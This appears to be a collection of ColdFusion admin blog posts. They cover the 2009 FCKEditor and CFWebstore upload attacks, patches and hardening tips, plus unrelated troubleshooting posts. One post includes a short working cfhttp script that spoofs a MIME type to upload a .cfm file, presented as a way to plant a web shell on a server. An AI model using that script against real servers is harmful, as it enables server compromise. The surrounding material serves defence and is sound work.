Theme

Had to change the theme as I couldn’t stand that links in my posts were barely visable with the old theme.

Recent ColdFusion Vulnerabilities Follow-Up

For about three weeks now, ColdFusion servers have been under attack making use of one of two exploits, one in older versions of an application written in ColdFusion and some through the built in FCKEditor.  Both of these issues have an active fix and should be handled with the utmost priority.
FCKEditor
When Adobe initially shipped ColdFusion 8.0 it included the FCKEditor, which was enabled when using <cftextarea richtext=”true”>.  In version 8.0, the built in FCKEditor file manager and uploader were disabled.  While there was a post about enabling them, most developers didn’t use these features much, either because they would rather handle file uploads separately.  However, when the upgrade to 8.0.1 was released, Adobe enabled file uploads by default on the FCKEditor instance.
It was determined that an attacker could access the upload files directly and by using some form of spoofing, get files uploaded to the server that could potentially allow compromise of Windows security.
To correct this, there are two fixes.  The first is simply to edit the config.cfm file at CFIDEscriptsajaxFCKeditoreditorfilemanagerconnectorscfm to disable uploads [see].  Also, Adobe released a security patch for this issue and is a very high level patch that should be applied to your servers [link].
CFWebstore
As I mentioned in my last post, users who were running older versions of CFWebstore could also be vulnerable due to a few upload scripts that are accessible directly and can be susceptible to file spoofing.  It’s important to note that CFWebstore responding very quickly providing a temporary fix to prevent access to the upload files.  They also released a more detailed description of what exactly was happening to servers which was compiled from many user’s experiences described on their mailing list.
Staying on Top of Things
So how can you stay on top of these sort of issues in the future?  My first recommendation is to subscribe to as many ColdFusion related blogs as possible, at least start with the ColdFusionBloggers.org feed.  Second, join any related forums or mailing lists related to any applications you are running.  Third, try to keep your software as up-to-date as possible, the longer software is in the wild, to more likely someone with lots of time on their hands has found some way of exploiting even the smallest hole to create a very large hassle for you.  Lastly, keep an eye on SANS Internet Storm Center which posts up and coming vulnerabilities that are being learned of and patched, this includes everything from Apple products, web applications, and Windows issues.
Additional Resources

 

CFWebstore File Upload Vulnerability

NOTE: Please read my follow-up to this and the recent FCKEditor issues affecting ColdFusion, also if you’re using TinyMCE with the TinyBrowser plugin read this post as well.
There has been a recent outbreak of attacks on servers running the ColdFusion shopping cart CFWebstore, that is allowing the attackers to upload a ColdFusion variant of the C99 shell script. This is giving them full access to your server and it will get compromised if they get that file up there.
Here’s what they do:

  1. Using the /customtags/uploadfile.cfm page, they are spoofing the MIME type to upload index.cfm and image.cfm to /images/accounts directory – these are their web shells (think of them like control panels).
  2. After having these web shells uploaded, things can go one of several ways:
    1. If you have cfexecute/cfregistry disabled, they will likely just inject JavaScript into every site on your server
    2. If you have cfexecute/cfregistry enabled, they will likely attack you with wminotify, this allows them to log and send back home all passwords used to log into the server for remote administration. At this point, you should probably plan to build a new server because this level of compromise is pretty deep and you likely won’t clean it all up.
    3. If you had cfexecute/cfregistry disabled and Sandbox security on each site, then only the CFWebstore site that was attacked will be injected with JavaScript.

So, you’ve been attacked, cleaned things up/rebuilt a server or two, what now? According to the folks at CFWebstore, you need to modify the application.cfm file for your store with this code from their blog. EDIT: More detailed information from CFWebstore. Use the link, not posting it incase something is changed in it. Also, I would suggest upgrading to the newest version as fast as possible for your budget and resources, since version 6, according to CFWebstore, certain upload files in the customtags directory are no longer used and are removed from the code base.
Additional details about the attack:

  • The shell contains many references to seraph, this is likely his/their blog in China
  • It looks like one of seraph’s buddies, chanm is actually doing the attack as I’ve seen Windows users created with the name of chanm$.
  • More info about wminotify.dll from Symantec
  • Read through the comments on Ray Camden’s post about this issue which includes many details from various people’s experience with this attack
  • The attacker is sometimes uploading a JSP file to get around the security layer in ColdFusion, which allows complete bypass of any Sandboxes you already had setup

While this is a specific attack on one application, the lessons learned can be applied to any web application:

  • DO NOT blindly trust the MIME types that are sent by a browser, these are easily spoofed.
  • DO upload outside you web root initially
  • DO additional checks on uploaded files before pushing them live (file extensions should match, use functions like isImageFile() and isPDFFile() in ColdFusion, etc.)
  • DO protect uploads with some sort of login (assuming your business rules preclude the public uploading content to your site)
  • DO disable JSP handling in ColdFusion if you don’t use it, see Adobe instructions.

Edit: Its been a long 2 weeks dealing with these, if I’ve missed something, let me know in the comments.
Last Update: 2 July 2009 12:40 PM

Spoofing MIME Types with ColdFusion and CFHTTP

Think your file uploads are secure? Think again. Using this very simple technique with ColdFusion installed locally, you can easily spoof the MIME type of any file and get it uploaded to another server, allowing any number of code exploits.
First, we’re going to write a quick file upload script:

<cfform name='upload' action='uploadact.cfm' enctype='multipart/form-data' method='post'>
<cfinput type='file'
name='FileUpload'
required='yes'
message='Select a file to upload.' /><br />
<cfinput
type='submit'
value='Upload File'
name='submit' />
</cfform>

Notice this goes to an action page called uploadact.cfm which only accepts jpegs and gifs, this form actually handles the upload as follows:

<cfif isDefined('fileUpload')>
<cffile
action='upload'
fileField='fileUpload'
destination='C:path to upload'
accept='image/jpeg,image/gif'
nameconflict='makeunique'>
<p>Thankyou, your file has been uploaded.</p>
<p><a href='/'>Return Home</a></p>
</cfif>

Now for the fun part, we’re going to write a page using cfhttp that would run on the attackers server/workstation that allows for files local to them to be uploaded by faking the MIME type with cfhttpparam:

<cfhttp
url='http://example.com/uploadact.cfm'
method='post'>
<cfhttpparam
type='formfield'
value='Upload File'
name='submit'>
<cfhttpparam
type='file'
name='FileUpload'
file='C:PathTo	est.cfm'
mimetype='image/jpeg'>
</cfhttp>

Now with this we could upload an ASP or ColdFusion based web shell that would essentially give us unlimited access to a server.  So follow the following tips:

  1. If you have an Enterprise license, use Sandbox Security.  This will limit each site to its own set of directories and data sources.
  2. Disable cfexecute and cfregistry.  If you can use Sandboxes, do this for each Sandbox, or setup a global Sandbox on your main site’s directory.  Remember with Sandboxes, if you absolutly need cfexecute, remember that you can setup a Sandbox for a single folder with access to it and put processing files in here (say to use FFMPEG for videos conversion).
  3. Disable JSP (Adobe Instructions) if you don’t actually use it.  Since the default for ColdFusion is to run as System on Windows, any JSP file that makes its way to the server will have full access, and JSP’s don’t follow Sandboxes, so even if they are setup they are of no use.
  4. Run ColdFusion as another user (Adobe Instructions).  Obviously, running ColdFusion as a less privileged user will prevent total control of your server should something malicious get uploaded
  5. Always perform multiple checks on your file uploads (Pete Freitag has a good article on this)

ColdFusion Variable Scopes

The need to understand how ColdFusion handles variable scopes is essential to keeping both your application and server running smoothly and preventing performance decreases.  Scoping your variables takes seconds at the time of development.  I frequently talk with customers who have ‘memory leaks’ and are quick to blame the application server, however a ColdFusion application server that doesn’t run code would not typically experience a leak.
The Scopes
 
Order of Evaluation
Should you specify a variable name with out a scope, ColdFusion has to search through the different scopes in order to determine if it exists.  As you might imagine, if this is on a very frequently requested page, this could cause significant slow-downs and performance issues.

  1. Function local (only UDFs and CFCs)
  2. Thread local (only inside threads)
  3. Arguments
  4. Variables
  5. Thread
  6. CGI
  7. Cffile
  8. URL
  9. Form
  10. Cookie
  11. Client

If the variable exists in any of the other scopes, it must be scoped properly to be accessed.
Additional Reading

 

Jason Dean’s Security Series

Jason over at 12Robots.com has been writing a really great series of articles about secure application development for quite some time.  Since I haven’t seen them all in one index, I threw up links to all the articles on this page.

I’m pretty sure I got them all from Jason’s site, but if I did just let me know in a comment.

ColdFusion Stops Serving After a Few Requests

Just had an issue where ColdFusion would only serve a few requests before locking up and sending constant 503 errors.  Turns out there were almost 200k files in C:Coldfusion8
untimeserverscoldfusionSERVER-INF empwwwroot-tmp.  So, to fix this I stopped ColdFusion, renamed wwwroot-tmp to wwwroot-tmp2 and make a new wwwroot-tmp.  Once ColdFusion was started it ran like a champ again.  My theory is the disk I/O was killing CF when it was looking for a chached file.

cfimage CAPTCHA Timer already cancelled

I’ve been running into this error more often lately.  Customers using cfimage to create a captcha image will sometimes get the following error when creating the image:

java.lang.IllegalStateException: Timer already cancelled.

It appears this is realted to Java not having enough memory to create an image, yet ColdFusion still has enough to run and serve pages, which means you have to restart ColdFusion at that point.
Anyone else run into this, or know of a way to prevent it?
 

ColdFusion Verity – Unable to create temporary file

While working on a ticket today, I came across an interesting error message while trying to index or refresh a Verity collection.

Unable to create temporary file 
java.lang.SecurityException: Unable to create temporary file
	at java.io.File.checkAndCreate(File.java:1701)
	at java.io.File.createTempFile(File.java:1793)
	at coldfusion.tagext.search.IndexTag.doQueryUpdate(IndexTag.java:702)
	at coldfusion.tagext.search.IndexTag.doStartTag(IndexTag.java:160)
	at coldfusion.runtime.CfJspPage._emptyTcfTag(CfJspPage.java:2661)
	at cfindexverity2ecfm902179424.runPage(C:Websites41334eaeindexverity.cfm:32)
	at coldfusion.runtime.CfJspPage.invoke(CfJspPage.java:196)
	at coldfusion.tagext.lang.IncludeTag.doStartTag(IncludeTag.java:370)
	at coldfusion.runtime.CfJspPage._emptyTcfTag(CfJspPage.java:2661)
	at cfApplication2ecfc1112783929$funcONREQUEST.runFunction(C:Websites41334eaeApplication.cfc:205)
	at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:418)
	at coldfusion.runtime.UDFMethod$ReturnTypeFilter.invoke(UDFMethod.java:360)
	at coldfusion.runtime.UDFMethod$ArgumentCollectionFilter.invoke(UDFMethod.java:324)
	at coldfusion.filter.FunctionAccessFilter.invoke(FunctionAccessFilter.java:59)
	at coldfusion.runtime.UDFMethod.runFilterChain(UDFMethod.java:277)
	at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:192)
	at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:448)
	at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:308)
	at coldfusion.runtime.AppEventInvoker.invoke(AppEventInvoker.java:74)
	at coldfusion.runtime.AppEventInvoker.onRequest(AppEventInvoker.java:243)
	at coldfusion.filter.ApplicationFilter.invoke(ApplicationFilter.java:269)
	at coldfusion.filter.RequestMonitorFilter.invoke(RequestMonitorFilter.java:48)
	at coldfusion.filter.MonitoringFilter.invoke(MonitoringFilter.java:40)
	at coldfusion.filter.PathFilter.invoke(PathFilter.java:86)
	at coldfusion.filter.ExceptionFilter.invoke(ExceptionFilter.java:70)
	at coldfusion.filter.ClientScopePersistenceFilter.invoke(ClientScopePersistenceFilter.java:28)
	at coldfusion.filter.BrowserFilter.invoke(BrowserFilter.java:38)
	at coldfusion.filter.NoCacheFilter.invoke(NoCacheFilter.java:46)
	at coldfusion.filter.GlobalsFilter.invoke(GlobalsFilter.java:38)
	at coldfusion.filter.DatasourceFilter.invoke(DatasourceFilter.java:22)
	at coldfusion.CfmServlet.service(CfmServlet.java:175)
	at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:86)
	at coldfusion.monitor.event.MonitoringServletFilter.doFilter(MonitoringServletFilter.java:42)
	at coldfusion.bootstrap.BootstrapFilter.doFilter(BootstrapFilter.java:46)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:94)
	at com.seefusion.Filter.doFilter(Filter.java:49)
	at com.seefusion.SeeFusion.doFilter(SeeFusion.java:1471)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:94)
	at jrun.servlet.FilterChain.service(FilterChain.java:101)
	at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106)
	at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
	at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:286)
	at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:543)
	at jrun.servlet.jrpp.JRunProxyService.invokeRunnable(JRunProxyService.java:203)
	at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:320)
	at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:428)
	at jrunx.scheduler.ThreadPool$UpstreamMetrics.invokeRunnable(ThreadPool.java:266)
	at jrunx.scheduler.WorkerThread.run(WorkerThread.java:66) 

Truns out that if you are using Sandbox Security you’ll need to add the value of the GetTempDirectory function to your Sandbox with read and write permissions and it will start working again.

cfimage CAPTCHA Not Displaying

You may occassionally run into a problem with ColdFusion and IIS where your CAPTCHA images created by cfimage are simply blank and look like they don’t exists.  Assuming you don’t have a corrupt installation, the following instructions will help fix this.

  1. Open IIS
  2. Expand the server your working with by clicking the plus sign and goto the properties for “Web Sites”
  3. In the Home Directory tab click on “Configuration”
  4. You should now be on the “Application Configuration” screen, select the Wildcard Mapping at the bottom which goes to cfroot/runtime/lib/wsconfig/1/jrun_iis6_wildcard.dll and hit Edit
  5. Make sure “Verify that file exists” is unchecked and hit OK until your back to the IIS Manager.

This should correct any issues you had with cfimage and many other tags that also create things “on the fly” in ColdFusion.